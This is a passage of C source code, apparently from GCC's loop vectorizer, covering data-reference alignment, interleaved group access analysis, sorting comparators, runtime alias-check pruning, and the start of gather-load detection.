"=== vect_analyze_data_refs_alignment ===\n");
/* Mark groups of data references with same alignment using
data dependence information. */
if (loop_vinfo)
{
vec<ddr_p> ddrs = LOOP_VINFO_DDRS (loop_vinfo);
struct data_dependence_relation *ddr;
unsigned int i;
FOR_EACH_VEC_ELT (ddrs, i, ddr)
vect_find_same_alignment_drs (ddr, loop_vinfo);
}
if (!vect_compute_data_refs_alignment (loop_vinfo, bb_vinfo))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: can't calculate alignment "
"for data ref.\n");
return false;
}
return true;
}
/* Analyze groups of accesses: check that DR belongs to a group of
accesses of legal size, step, etc. Detect gaps, single element
interleaving, and other special cases. Set grouped access info.
Collect groups of strided stores for further use in SLP analysis. */
static bool
vect_analyze_group_access (struct data_reference *dr)
{
tree step = DR_STEP (dr);
tree scalar_type = TREE_TYPE (DR_REF (dr));
HOST_WIDE_INT type_size = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (scalar_type));
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
bb_vec_info bb_vinfo = STMT_VINFO_BB_VINFO (stmt_info);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
HOST_WIDE_INT groupsize, last_accessed_element = 1;
bool slp_impossible = false;
struct loop *loop = NULL;
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
/* For interleaving, GROUPSIZE is STEP counted in elements, i.e., the
size of the interleaving group (including gaps). */
groupsize = absu_hwi (dr_step) / type_size;
/* Not consecutive access is possible only if it is a part of interleaving. */
if (!GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)))
{
/* Check if it this DR is a part of interleaving, and is a single
element of the group that is accessed in the loop. */
/* Gaps are supported only for loads. STEP must be a multiple of the type
size. The size of the group must be a power of 2. */
if (DR_IS_READ (dr)
&& (dr_step % type_size) == 0
&& groupsize > 0
&& exact_log2 (groupsize) != -1)
{
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = stmt;
GROUP_SIZE (vinfo_for_stmt (stmt)) = groupsize;
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Detected single element interleaving ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dr));
dump_printf (MSG_NOTE, " step ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, step);
dump_printf (MSG_NOTE, "\n");
}
if (loop_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Data access with gaps requires scalar "
"epilogue loop\n");
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Peeling for outer loop is not"
" supported\n");
return false;
}
LOOP_VINFO_PEELING_FOR_GAPS (loop_vinfo) = true;
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not consecutive access ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
{
/* Mark the statement as unvectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
return true;
}
return false;
}
if (GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) == stmt)
{
/* First stmt in the interleaving chain. Check the chain. */
gimple next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (stmt));
struct data_reference *data_ref = dr;
unsigned int count = 1;
tree prev_init = DR_INIT (data_ref);
gimple prev = stmt;
HOST_WIDE_INT diff, gaps = 0;
unsigned HOST_WIDE_INT count_in_bytes;
while (next)
{
/* Skip same data-refs. In case that two or more stmts share
data-ref (supported only for loads), we vectorize only the first
stmt, and the rest get their vectorized loads from the first
one. */
if (!tree_int_cst_compare (DR_INIT (data_ref),
DR_INIT (STMT_VINFO_DATA_REF (
vinfo_for_stmt (next)))))
{
if (DR_IS_WRITE (data_ref))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Two store stmts share the same dr.\n");
return false;
}
/* For load use the same data-ref load. */
GROUP_SAME_DR_STMT (vinfo_for_stmt (next)) = prev;
prev = next;
next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next));
continue;
}
prev = next;
data_ref = STMT_VINFO_DATA_REF (vinfo_for_stmt (next));
/* All group members have the same STEP by construction. */
gcc_checking_assert (operand_equal_p (DR_STEP (data_ref), step, 0));
/* Check that the distance between two accesses is equal to the type
size. Otherwise, we have gaps. */
diff = (TREE_INT_CST_LOW (DR_INIT (data_ref))
- TREE_INT_CST_LOW (prev_init)) / type_size;
if (diff != 1)
{
/* FORNOW: SLP of accesses with gaps is not supported. */
slp_impossible = true;
if (DR_IS_WRITE (data_ref))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaved store with gaps\n");
return false;
}
gaps += diff - 1;
}
last_accessed_element += diff;
/* Store the gap from the previous member of the group. If there is no
gap in the access, GROUP_GAP is always 1. */
GROUP_GAP (vinfo_for_stmt (next)) = diff;
prev_init = DR_INIT (data_ref);
next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next));
/* Count the number of data-refs in the chain. */
count++;
}
/* COUNT is the number of accesses found, we multiply it by the size of
the type to get COUNT_IN_BYTES. */
count_in_bytes = type_size * count;
/* Check that the size of the interleaving (including gaps) is not
greater than STEP. */
if (dr_step != 0
&& absu_hwi (dr_step) < count_in_bytes + gaps * type_size)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaving size is greater than step for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dr));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
/* Check that the size of the interleaving is equal to STEP for stores,
i.e., that there are no gaps. */
if (dr_step != 0
&& absu_hwi (dr_step) != count_in_bytes)
{
if (DR_IS_READ (dr))
{
slp_impossible = true;
/* There is a gap after the last load in the group. This gap is a
difference between the groupsize and the number of elements.
When there is no gap, this difference should be 0. */
GROUP_GAP (vinfo_for_stmt (stmt)) = groupsize - count;
}
else
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaved store with gaps\n");
return false;
}
}
/* Check that STEP is a multiple of type size. */
if (dr_step != 0
&& (dr_step % type_size) != 0)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"step is not a multiple of type size: step ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, step);
dump_printf (MSG_MISSED_OPTIMIZATION, " size ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
TYPE_SIZE_UNIT (scalar_type));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
if (groupsize == 0)
groupsize = count;
GROUP_SIZE (vinfo_for_stmt (stmt)) = groupsize;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Detected interleaving of size %d\n", (int)groupsize);
/* SLP: create an SLP data structure for every interleaving group of
stores for further analysis in vect_analyse_slp. */
if (DR_IS_WRITE (dr) && !slp_impossible)
{
if (loop_vinfo)
LOOP_VINFO_GROUPED_STORES (loop_vinfo).safe_push (stmt);
if (bb_vinfo)
BB_VINFO_GROUPED_STORES (bb_vinfo).safe_push (stmt);
}
/* There is a gap in the end of the group. */
if (groupsize - last_accessed_element > 0 && loop_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Data access with gaps requires scalar "
"epilogue loop\n");
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Peeling for outer loop is not supported\n");
return false;
}
LOOP_VINFO_PEELING_FOR_GAPS (loop_vinfo) = true;
}
}
return true;
}
/* Analyze the access pattern of the data-reference DR.
In case of non-consecutive accesses call vect_analyze_group_access() to
analyze groups of accesses. */
static bool
vect_analyze_data_ref_access (struct data_reference *dr)
{
tree step = DR_STEP (dr);
tree scalar_type = TREE_TYPE (DR_REF (dr));
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
if (loop_vinfo && !step)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"bad data-ref access in loop\n");
return false;
}
/* Allow invariant loads in not nested loops. */
if (loop_vinfo && integer_zerop (step))
{
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
if (nested_in_vect_loop_p (loop, stmt))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"zero step in inner loop of nest\n");
return false;
}
return DR_IS_READ (dr);
}
if (loop && nested_in_vect_loop_p (loop, stmt))
{
/* Interleaved accesses are not yet supported within outer-loop
vectorization for references in the inner-loop. */
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
/* For the rest of the analysis we use the outer-loop step. */
step = STMT_VINFO_DR_STEP (stmt_info);
if (integer_zerop (step))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"zero step in outer loop.\n");
if (DR_IS_READ (dr))
return true;
else
return false;
}
}
/* Consecutive? */
if (TREE_CODE (step) == INTEGER_CST)
{
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (!tree_int_cst_compare (step, TYPE_SIZE_UNIT (scalar_type))
|| (dr_step < 0
&& !compare_tree_int (TYPE_SIZE_UNIT (scalar_type), -dr_step)))
{
/* Mark that it is not interleaving. */
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
return true;
}
}
if (loop && nested_in_vect_loop_p (loop, stmt))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"grouped access in outer loop.\n");
return false;
}
/* Assume this is a DR handled by non-constant strided load case. */
if (TREE_CODE (step) != INTEGER_CST)
return STMT_VINFO_STRIDE_LOAD_P (stmt_info);
/* Not consecutive access - check if it's a part of interleaving group. */
return vect_analyze_group_access (dr);
}
/* A helper function used in the comparator function to sort data
references. T1 and T2 are two data references to be compared.
The function returns -1, 0, or 1. */
static int
compare_tree (tree t1, tree t2)
{
int i, cmp;
enum tree_code code;
char tclass;
if (t1 == t2)
return 0;
if (t1 == NULL)
return -1;
if (t2 == NULL)
return 1;
if (TREE_CODE (t1) != TREE_CODE (t2))
return TREE_CODE (t1) < TREE_CODE (t2) ? -1 : 1;
code = TREE_CODE (t1);
switch (code)
{
/* For const values, we can just use hash values for comparisons. */
case INTEGER_CST:
case REAL_CST:
case FIXED_CST:
case STRING_CST:
case COMPLEX_CST:
case VECTOR_CST:
{
hashval_t h1 = iterative_hash_expr (t1, 0);
hashval_t h2 = iterative_hash_expr (t2, 0);
if (h1 != h2)
return h1 < h2 ? -1 : 1;
break;
}
case SSA_NAME:
cmp = compare_tree (SSA_NAME_VAR (t1), SSA_NAME_VAR (t2));
if (cmp != 0)
return cmp;
if (SSA_NAME_VERSION (t1) != SSA_NAME_VERSION (t2))
return SSA_NAME_VERSION (t1) < SSA_NAME_VERSION (t2) ? -1 : 1;
break;
default:
tclass = TREE_CODE_CLASS (code);
/* For var-decl, we could compare their UIDs. */
if (tclass == tcc_declaration)
{
if (DECL_UID (t1) != DECL_UID (t2))
return DECL_UID (t1) < DECL_UID (t2) ? -1 : 1;
break;
}
/* For expressions with operands, compare their operands recursively. */
for (i = TREE_OPERAND_LENGTH (t1) - 1; i >= 0; --i)
{
cmp = compare_tree (TREE_OPERAND (t1, i), TREE_OPERAND (t2, i));
if (cmp != 0)
return cmp;
}
}
return 0;
}
/* Compare two data-references DRA and DRB to group them into chunks
suitable for grouping. */
static int
dr_group_sort_cmp (const void *dra_, const void *drb_)
{
data_reference_p dra = *(data_reference_p *)const_cast<void *>(dra_);
data_reference_p drb = *(data_reference_p *)const_cast<void *>(drb_);
int cmp;
/* Stabilize sort. */
if (dra == drb)
return 0;
/* Ordering of DRs according to base. */
if (!operand_equal_p (DR_BASE_ADDRESS (dra), DR_BASE_ADDRESS (drb), 0))
{
cmp = compare_tree (DR_BASE_ADDRESS (dra), DR_BASE_ADDRESS (drb));
if (cmp != 0)
return cmp;
}
/* And according to DR_OFFSET. */
if (!dr_equal_offsets_p (dra, drb))
{
cmp = compare_tree (DR_OFFSET (dra), DR_OFFSET (drb));
if (cmp != 0)
return cmp;
}
/* Put reads before writes. */
if (DR_IS_READ (dra) != DR_IS_READ (drb))
return DR_IS_READ (dra) ? -1 : 1;
/* Then sort after access size. */
if (!operand_equal_p (TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra))),
TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb))), 0))
{
cmp = compare_tree (TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra))),
TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb))));
if (cmp != 0)
return cmp;
}
/* And after step. */
if (!operand_equal_p (DR_STEP (dra), DR_STEP (drb), 0))
{
cmp = compare_tree (DR_STEP (dra), DR_STEP (drb));
if (cmp != 0)
return cmp;
}
/* Then sort after DR_INIT. In case of identical DRs sort after stmt UID. */
cmp = tree_int_cst_compare (DR_INIT (dra), DR_INIT (drb));
if (cmp == 0)
return gimple_uid (DR_STMT (dra)) < gimple_uid (DR_STMT (drb)) ? -1 : 1;
return cmp;
}
/* Function vect_analyze_data_ref_accesses.
Analyze the access pattern of all the data references in the loop.
FORNOW: the only access pattern that is considered vectorizable is a
simple step 1 (consecutive) access.
FORNOW: handle only arrays and pointer accesses. */
bool
vect_analyze_data_ref_accesses (loop_vec_info loop_vinfo, bb_vec_info bb_vinfo)
{
unsigned int i;
vec<data_reference_p> datarefs;
struct data_reference *dr;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_ref_accesses ===\n");
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
if (datarefs.is_empty ())
return true;
/* Sort the array of datarefs to make building the interleaving chains
linear. Don't modify the original vector's order, it is needed for
determining what dependencies are reversed. */
vec<data_reference_p> datarefs_copy = datarefs.copy ();
datarefs_copy.qsort (dr_group_sort_cmp);
/* Build the interleaving chains. */
for (i = 0; i < datarefs_copy.length () - 1;)
{
data_reference_p dra = datarefs_copy[i];
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info lastinfo = NULL;
for (i = i + 1; i < datarefs_copy.length (); ++i)
{
data_reference_p drb = datarefs_copy[i];
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
/* ??? Imperfect sorting (non-compatible types, non-modulo
accesses, same accesses) can lead to a group to be artificially
split here as we don't just skip over those. If it really
matters we can push those to a worklist and re-iterate
over them. The we can just skip ahead to the next DR here. */
/* Check that the data-refs have same first location (except init)
and they are both either store or load (not load and store,
not masked loads or stores). */
if (DR_IS_READ (dra) != DR_IS_READ (drb)
|| !operand_equal_p (DR_BASE_ADDRESS (dra),
DR_BASE_ADDRESS (drb), 0)
|| !dr_equal_offsets_p (dra, drb)
|| !gimple_assign_single_p (DR_STMT (dra))
|| !gimple_assign_single_p (DR_STMT (drb)))
break;
/* Check that the data-refs have the same constant size and step. */
tree sza = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra)));
tree szb = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb)));
if (!tree_fits_uhwi_p (sza)
|| !tree_fits_uhwi_p (szb)
|| !tree_int_cst_equal (sza, szb)
|| !tree_fits_shwi_p (DR_STEP (dra))
|| !tree_fits_shwi_p (DR_STEP (drb))
|| !tree_int_cst_equal (DR_STEP (dra), DR_STEP (drb)))
break;
/* Do not place the same access in the interleaving chain twice. */
if (tree_int_cst_compare (DR_INIT (dra), DR_INIT (drb)) == 0)
break;
/* Check the types are compatible.
??? We don't distinguish this during sorting. */
if (!types_compatible_p (TREE_TYPE (DR_REF (dra)),
TREE_TYPE (DR_REF (drb))))
break;
/* Sorting has ensured that DR_INIT (dra) <= DR_INIT (drb). */
HOST_WIDE_INT init_a = TREE_INT_CST_LOW (DR_INIT (dra));
HOST_WIDE_INT init_b = TREE_INT_CST_LOW (DR_INIT (drb));
gcc_assert (init_a < init_b);
/* If init_b == init_a + the size of the type * k, we have an
interleaving, and DRA is accessed before DRB. */
HOST_WIDE_INT type_size_a = tree_to_uhwi (sza);
if ((init_b - init_a) % type_size_a != 0)
break;
/* The step (if not zero) is greater than the difference between
data-refs' inits. This splits groups into suitable sizes. */
HOST_WIDE_INT step = tree_to_shwi (DR_STEP (dra));
if (step != 0 && step <= (init_b - init_a))
break;
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Detected interleaving ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
/* Link the found element into the group list. */
if (!GROUP_FIRST_ELEMENT (stmtinfo_a))
{
GROUP_FIRST_ELEMENT (stmtinfo_a) = DR_STMT (dra);
lastinfo = stmtinfo_a;
}
GROUP_FIRST_ELEMENT (stmtinfo_b) = DR_STMT (dra);
GROUP_NEXT_ELEMENT (lastinfo) = DR_STMT (drb);
lastinfo = stmtinfo_b;
}
}
FOR_EACH_VEC_ELT (datarefs_copy, i, dr)
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr)))
&& !vect_analyze_data_ref_access (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: complicated access pattern.\n");
if (bb_vinfo)
{
/* Mark the statement as not vectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
continue;
}
else
{
datarefs_copy.release ();
return false;
}
}
datarefs_copy.release ();
return true;
}
/* Operator == between two dr_with_seg_len objects.
This equality operator is used to make sure two data refs
are the same one so that we will consider to combine the
aliasing checks of those two pairs of data dependent data
refs. */
static bool
operator == (const dr_with_seg_len& d1,
const dr_with_seg_len& d2)
{
return operand_equal_p (DR_BASE_ADDRESS (d1.dr),
DR_BASE_ADDRESS (d2.dr), 0)
&& compare_tree (d1.offset, d2.offset) == 0
&& compare_tree (d1.seg_len, d2.seg_len) == 0;
}
/* Function comp_dr_with_seg_len_pair.
Comparison function for sorting objects of dr_with_seg_len_pair_t
so that we can combine aliasing checks in one scan. */
static int
comp_dr_with_seg_len_pair (const void *p1_, const void *p2_)
{
const dr_with_seg_len_pair_t* p1 = (const dr_with_seg_len_pair_t *) p1_;
const dr_with_seg_len_pair_t* p2 = (const dr_with_seg_len_pair_t *) p2_;
const dr_with_seg_len &p11 = p1->first,
&p12 = p1->second,
&p21 = p2->first,
&p22 = p2->second;
/* For DR pairs (a, b) and (c, d), we only consider to merge the alias checks
if a and c have the same basic address snd step, and b and d have the same
address and step. Therefore, if any a&c or b&d don't have the same address
and step, we don't care the order of those two pairs after sorting. */
int comp_res;
if ((comp_res = compare_tree (DR_BASE_ADDRESS (p11.dr),
DR_BASE_ADDRESS (p21.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_BASE_ADDRESS (p12.dr),
DR_BASE_ADDRESS (p22.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_STEP (p11.dr), DR_STEP (p21.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_STEP (p12.dr), DR_STEP (p22.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (p11.offset, p21.offset)) != 0)
return comp_res;
if ((comp_res = compare_tree (p12.offset, p22.offset)) != 0)
return comp_res;
return 0;
}
/* Function vect_vfa_segment_size.
Create an expression that computes the size of segment
that will be accessed for a data reference. The functions takes into
account that realignment loads may access one more vector.
Input:
DR: The data reference.
LENGTH_FACTOR: segment length to consider.
Return an expression whose value is the size of segment which will be
accessed by DR. */
static tree
vect_vfa_segment_size (struct data_reference *dr, tree length_factor)
{
tree segment_length;
if (integer_zerop (DR_STEP (dr)))
segment_length = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dr)));
else
segment_length = size_binop (MULT_EXPR,
fold_convert (sizetype, DR_STEP (dr)),
fold_convert (sizetype, length_factor));
if (vect_supportable_dr_alignment (dr, false)
== dr_explicit_realign_optimized)
{
tree vector_size = TYPE_SIZE_UNIT
(STMT_VINFO_VECTYPE (vinfo_for_stmt (DR_STMT (dr))));
segment_length = size_binop (PLUS_EXPR, segment_length, vector_size);
}
return segment_length;
}
/* Function vect_prune_runtime_alias_test_list.
Prune a list of ddrs to be tested at run-time by versioning for alias.
Merge several alias checks into one if possible.
Return FALSE if resulting list of ddrs is longer then allowed by
PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS, otherwise return TRUE. */
bool
vect_prune_runtime_alias_test_list (loop_vec_info loop_vinfo)
{
vec<ddr_p> may_alias_ddrs =
LOOP_VINFO_MAY_ALIAS_DDRS (loop_vinfo);
vec<dr_with_seg_len_pair_t>& comp_alias_ddrs =
LOOP_VINFO_COMP_ALIAS_DDRS (loop_vinfo);
int vect_factor = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
tree scalar_loop_iters = LOOP_VINFO_NITERS (loop_vinfo);
ddr_p ddr;
unsigned int i;
tree length_factor;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_prune_runtime_alias_test_list ===\n");
if (may_alias_ddrs.is_empty ())
return true;
/* Basically, for each pair of dependent data refs store_ptr_0
and load_ptr_0, we create an expression:
((store_ptr_0 + store_segment_length_0) <= load_ptr_0)
|| (load_ptr_0 + load_segment_length_0) <= store_ptr_0))
for aliasing checks. However, in some cases we can decrease
the number of checks by combining two checks into one. For
example, suppose we have another pair of data refs store_ptr_0
and load_ptr_1, and if the following condition is satisfied:
load_ptr_0 < load_ptr_1 &&
load_ptr_1 - load_ptr_0 - load_segment_length_0 < store_segment_length_0
(this condition means, in each iteration of vectorized loop,
the accessed memory of store_ptr_0 cannot be between the memory
of load_ptr_0 and load_ptr_1.)
we then can use only the following expression to finish the
alising checks between store_ptr_0 & load_ptr_0 and
store_ptr_0 & load_ptr_1:
((store_ptr_0 + store_segment_length_0) <= load_ptr_0)
|| (load_ptr_1 + load_segment_length_1 <= store_ptr_0))
Note that we only consider that load_ptr_0 and load_ptr_1 have the
same basic address. */
comp_alias_ddrs.create (may_alias_ddrs.length ());
/* First, we collect all data ref pairs for aliasing checks. */
FOR_EACH_VEC_ELT (may_alias_ddrs, i, ddr)
{
struct data_reference *dr_a, *dr_b;
gimple dr_group_first_a, dr_group_first_b;
tree segment_length_a, segment_length_b;
gimple stmt_a, stmt_b;
dr_a = DDR_A (ddr);
stmt_a = DR_STMT (DDR_A (ddr));
dr_group_first_a = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt_a));
if (dr_group_first_a)
{
stmt_a = dr_group_first_a;
dr_a = STMT_VINFO_DATA_REF (vinfo_for_stmt (stmt_a));
}
dr_b = DDR_B (ddr);
stmt_b = DR_STMT (DDR_B (ddr));
dr_group_first_b = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt_b));
if (dr_group_first_b)
{
stmt_b = dr_group_first_b;
dr_b = STMT_VINFO_DATA_REF (vinfo_for_stmt (stmt_b));
}
if (!operand_equal_p (DR_STEP (dr_a), DR_STEP (dr_b), 0))
length_factor = scalar_loop_iters;
else
length_factor = size_int (vect_factor);
segment_length_a = vect_vfa_segment_size (dr_a, length_factor);
segment_length_b = vect_vfa_segment_size (dr_b, length_factor);
dr_with_seg_len_pair_t dr_with_seg_len_pair
(dr_with_seg_len (dr_a, segment_length_a),
dr_with_seg_len (dr_b, segment_length_b));
if (compare_tree (DR_BASE_ADDRESS (dr_a), DR_BASE_ADDRESS (dr_b)) > 0)
std::swap (dr_with_seg_len_pair.first, dr_with_seg_len_pair.second);
comp_alias_ddrs.safe_push (dr_with_seg_len_pair);
}
/* Second, we sort the collected data ref pairs so that we can scan
them once to combine all possible aliasing checks. */
comp_alias_ddrs.qsort (comp_dr_with_seg_len_pair);
/* Third, we scan the sorted dr pairs and check if we can combine
alias checks of two neighbouring dr pairs. */
for (size_t i = 1; i < comp_alias_ddrs.length (); ++i)
{
/* Deal with two ddrs (dr_a1, dr_b1) and (dr_a2, dr_b2). */
dr_with_seg_len *dr_a1 = &comp_alias_ddrs[i-1].first,
*dr_b1 = &comp_alias_ddrs[i-1].second,
*dr_a2 = &comp_alias_ddrs[i].first,
*dr_b2 = &comp_alias_ddrs[i].second;
/* Remove duplicate data ref pairs. */
if (*dr_a1 == *dr_a2 && *dr_b1 == *dr_b2)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"found equal ranges ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a1->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b1->dr));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a2->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b2->dr));
dump_printf (MSG_NOTE, "\n");
}
comp_alias_ddrs.ordered_remove (i--);
continue;
}
if (*dr_a1 == *dr_a2 || *dr_b1 == *dr_b2)
{
/* We consider the case that DR_B1 and DR_B2 are same memrefs,
and DR_A1 and DR_A2 are two consecutive memrefs. */
if (*dr_a1 == *dr_a2)
{
std::swap (dr_a1, dr_b1);
std::swap (dr_a2, dr_b2);
}
if (!operand_equal_p (DR_BASE_ADDRESS (dr_a1->dr),
DR_BASE_ADDRESS (dr_a2->dr),
0)
|| !tree_fits_shwi_p (dr_a1->offset)
|| !tree_fits_shwi_p (dr_a2->offset))
continue;
HOST_WIDE_INT diff = (tree_to_shwi (dr_a2->offset)
- tree_to_shwi (dr_a1->offset));
/* Now we check if the following condition is satisfied:
DIFF - SEGMENT_LENGTH_A < SEGMENT_LENGTH_B
where DIFF = DR_A2->OFFSET - DR_A1->OFFSET. However,
SEGMENT_LENGTH_A or SEGMENT_LENGTH_B may not be constant so we
have to make a best estimation. We can get the minimum value
of SEGMENT_LENGTH_B as a constant, represented by MIN_SEG_LEN_B,
then either of the following two conditions can guarantee the
one above:
1: DIFF <= MIN_SEG_LEN_B
2: DIFF - SEGMENT_LENGTH_A < MIN_SEG_LEN_B
*/
HOST_WIDE_INT min_seg_len_b = (tree_fits_shwi_p (dr_b1->seg_len)
? tree_to_shwi (dr_b1->seg_len)
: vect_factor);
if (diff <= min_seg_len_b
|| (tree_fits_shwi_p (dr_a1->seg_len)
&& diff - tree_to_shwi (dr_a1->seg_len) < min_seg_len_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"merging ranges for ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a1->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b1->dr));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a2->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b2->dr));
dump_printf (MSG_NOTE, "\n");
}
dr_a1->seg_len = size_binop (PLUS_EXPR,
dr_a2->seg_len, size_int (diff));
comp_alias_ddrs.ordered_remove (i--);
}
}
}
dump_printf_loc (MSG_NOTE, vect_location,
"improved number of alias checks from %d to %d\n",
may_alias_ddrs.length (), comp_alias_ddrs.length ());
if ((int) comp_alias_ddrs.length () >
PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS))
return false;
return true;
}
/* Check whether a non-affine read in stmt is suitable for gather load
and if so, return a builtin decl for that operation. */
tree
vect_check_gather (gimple stmt, loop_vec_info loop_vinfo, tree *basep,
tree *offp, int *scalep)
{
HOST_WIDE_INT scale = 1, pbitpos, pbitsize;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree offtype = NULL_TREE;
tree decl, base, off;
machine_mode pmode;
int punsignedp, pvolatilep;
base = DR_REF (dr);
/* For masked loads/stores, DR_REF (dr) is an artificial MEM_REF,
see if we can use the def stmt of the address. */
if (is_gimple_call (stmt)
&& gimple_call_internal_p (stmt)
&& (gimple_call_internal_fn (stmt) == IFN_MASK_LOAD
|| gimple_call_internal_fn (stmt) == IFN_MASK_STORE)
&& TREE_CODE (base) == MEM_REF
&& TREE_CODE (TREE_OPERAND (base, 0)) == SSA_NAME
&& integer_zerop (TREE_OPERAND (base, 1))
&& !expr_invariant_in_loop_p (loop, TREE_OPERAND (base, 0)))
{
gimple def_stmt = SSA_NAME_DEF_STMT (TREE_OPERAND (base, 0));
if (is_gimple_assign (def_stmt)
&& gimple_assign_rhs_code (def_stmt) == ADDR_EXPR)
